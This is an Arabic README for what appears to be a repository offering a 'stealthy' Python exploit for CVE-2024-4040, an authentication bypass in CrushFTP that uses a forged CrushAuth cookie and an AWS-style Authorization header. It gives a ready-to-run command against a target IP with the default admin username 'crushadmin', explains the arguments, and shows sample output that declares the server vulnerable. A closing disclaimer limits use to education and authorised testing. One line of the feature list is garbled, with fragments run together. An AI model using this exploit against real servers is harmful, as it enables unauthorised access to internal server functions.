
استغلال لـ CVE-2024-4040 – تجاوز المصادقة في CrushFTP عبر ملف تعريف الارتباط CrushAuth وتزوير رأس على غرار AWS. إثبات مفهوم Python خفي مع إنشاء رمز آمن، تجاوز SSL، ومخرجات محسنة.
يحتوي هذا المستودع على استغلال Python خفي لإثبات المفهوم (PoC) لـ CVE-2024-4040، وهي ثغرة حرجة في CrushFTP (الإصدار 10 والإصدارات الأقدم) تسمح للمهاجم بتجاوز المصادقة باستخدام ملف تعريف ارتباط CrushAuth مزور ورأس ترخيص Authorization على نمط AWS.
يمكن لمهاجم غير مصادق تجاوز المصادقة في حالات CrushFTP الضعيفة عن طريق صياغة مجموعة معينة من ملف تعريف ارتباط/رأس، مما يمنحه وصولًا غير مصرح به إلى وظائف الويب الداخلية.
CrushAuth باستخدام secretsAuthorization مزيف صالح على نمط AWSrequests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — عنوان URL الأساسي لخادم CrushFTP
--valid_username — مستخدم صالح معروف (الافتراضي: crushadmin)
🔍 مثال على المخرجات
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
هذا الكود لأغراض تعليمية واختبار الأمان المصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
إعادة هيكلة PoC: illdeed